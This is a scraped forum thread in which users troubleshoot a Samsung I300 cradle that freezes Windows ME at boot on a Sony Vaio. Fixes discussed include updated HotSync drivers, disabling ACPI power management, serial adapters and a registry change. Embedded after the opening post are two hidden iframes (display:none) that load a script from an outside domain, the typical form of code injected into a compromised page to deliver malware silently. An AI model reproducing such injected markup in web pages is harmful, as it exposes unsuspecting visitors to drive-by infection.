+ Reply to Thread

Windows ME hangs with cradle connected

I have just received my I300 and have not been able to get it working with my Sony Vaio laptop running Windows ME.

System: Sony Vaio R505 laptop, Palm desktop 4.01, Windows ME

Problem: With the I300 cradle connected to my laptop, Windows ME hangs during the boot sequence. If I just disconnect the cradle, the boot continues.

Background: I'm a long time user of a Palm 3, and that works fine with this computer.

Attempted fixes: installed the latest BIOS from Sony, checked the Windows website for ME updates, tried running a bootlog start up of Windows (can't find the bootlog file, but the hang occurs just after the msmouse.vxd file is loaded).

Does anyone have a suggestion on how to fix this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

There are updated drivers for Hotsync and /ME that may work for you.

http://www.palm.com/support/downloads/

On the MS Knowledge base: search for WIN/ME and msmouse.vxd and Palm for more info.

Or this tool from Palm.
    Palm Checkup Tool
    Last edited by Skip; 12-25-2001 at 12:01 PM.

No Problem Here

I am running Windows ME and have never had a problem with my computer booting up with the I300 cradle connected. I am also running Palm Desktop 4.01.

Laurie

Administrator

Arrow

i had this problem but i had 98se.. the culprit was the power management..

go to the bios and disable the power management. this will stop the problem...

samsung is aware of this problem as i was the first one to report it to samsung (via level 2 support).

if you do a ctr/alt/del you would preobably see "msgsrv32 not responding" in the box (not sure ifyouh can do this via win ME).

disabling the ACPI (sp? on the acronym) will cure this!

Thank you all for your suggestions, however nothing worked. Palm did have a reference to my problem with their Hotsync Manager Updater 3.1.1, but this upgrade didn't fix the problem. I also tried the power management suggestion, but the BIOS wouldn't let me disable ACPI (I could only disable the CPU control). I tried disabling and killing everything possible in Windows, but still no joy. I've invested way too much time into this problem and I'm now returning the phone. It appears that there is some fundamental conflict between the Samsung and Sony Vaio (my Palm 3 works fine). However, I did learn a few things in this ordeal:

1) Palm won't support the I300. Ok, fair enough, it isn't their product. But the Hotsync Manager IS their product and they specifically mentioned this problem. Their "Chat" service support is a nice idea, but they were downright rude; cutting me off in mid-discussion when learning it was an I300 problem.

2) Samsung is an impenetrable fortress. There doesn't seem to be any way to contact these guys. Every "contact" or "support" page would end up as a dead link (in both Netscape and IE). I've also tried to contact them regarding developer support with the same results.

Sprint offered the best support and gets an A for effort, but there was no success there either. Perhaps I'll try the Treo when it comes out.

Thanks again!

Beams from above...
    Can you explain a little more about how you are trying to sync? I have a Vaio SR17 running WinMe and have not had any problems.

Are you using a Serial-to-USB conversion cable and trying to use the USB port on the 505? If so, right click on the Hotsync icon in the system tray and experiment with checking "Local USB" or "Local Serial".

Did you receive any error messages during the installation of the I300 software?

Have you tried removing the software from the notebook, performing a hard reset of the I300 and starting all over?

John

Administrator

Arrow

are you using the updated palm desktop 4.0.1???? if not, dl this first and try again... the problem IS the ACPI in the computer.. if you have the power management feature in ME ( if win 98 has it, i know ME should) you CAN disable it. that is the CAUSE of the issue!!!!!

dont give up yet.. try again witrh 4.0.1 and go back into your BIOS in the CMOS setup and disable ACPI...

again, if you have power management, its there..

Computer Lock up when cradle is connected

Very simple solution.
    Connect cradle to a 9 pin to 25 pin (male to female) connector
    then connect to the computer using another 25 pin to 9 pin (male to female) connector. I was very skeptical at first but it works on my Window ME Sony Vaio desktop. I actually thought I had a virus and re formated the whole darn drive. Never realized that it was the cradle.

Palm actually provide this adaptor free for Palm device but I300 is not considered as a product of Palm.

This information took me hours of calling to various places and finally found someone that knows the problem and how to fix it.

Administrator

Arrow

this has already been discussed on anther thread. i had this problem and after researching it, found out the ACPI in the BIOS neded to be turned off (power management).. this solved everything...

like you i reofrmatted my whole freakin' drive and did not even thiink to look at the cradle... expecially since i have been using the kyo 6035 before getting the i300...

I got this problem fixed in the end. I tried the "9-pin to 25-pin to 9-pin" connector trick suggested in another thread, but this did nothing for me. As Marctronixx suggested, it was in the power management. Unfortunately, the Vaio BIOS doesn't let you disable ACPI. (BTW, disabling power management in Windows doesn't disable ACPI, I tried) But I found on the Microsoft website that I could disable ACPI managment of just the serial port. This required making a change to one bit in the windows registry. After this change, it works fine.

Thanks again for your help.

Angry serial cradle & WinMe?

One out of three times when I turn on my windows Me e-machine with the i300 cradle plugged into the serial port, the loading of windows freezes at the Me screen, I have to cut the power and start over. Normally, the issue isn't resolved until I unplug the cradle and re-boot the computer without it. This works just about everytime. Once my computer boots, i shut it down and plug the cradle back in and try again. Windows will now load ok most of the time (2 out of 3 times). Any suggestions? Can I just get a serial to USB adapter and plug the usb connection in after my computer has booted up? Anybody else run into this problem? Any software updates to fix this??? Any info would really help, thanks - jdoe133

Administrator

Arrow

read this thread and yuo will discover that the culprit is the Power management. go into your BIOS and change the power management to OFF or Disable.

DiagTek,
    Someone asked the question I was thinking of and I did not see your reply. Are you using a usb to serial converter????

If so there are only 3 types that are known to work,.... just the USB hub/port replicator that cam with the sony will not work.
    You have to connect 1 of these:

Palm connect USB Kit
    Belkin USB-Serial Conv.
    or
    Keyspan USB-Serial Conv.

to one of the USB ports built in to the Laptop, and then to the i300 Cradle.

I suggest the Keyspan Product as I have had great success with it. I have an IBM Thinkpad T21 that I swap drives in. I have every OS Microsoft has ever released on a seperate hard drive, and I have gotten this to work on all from 98-se to XP corp Ed.

Hope this helps,
    SoNnIcC_pHrEaK
    "He who Boots NT, .. Fears the Penguin!"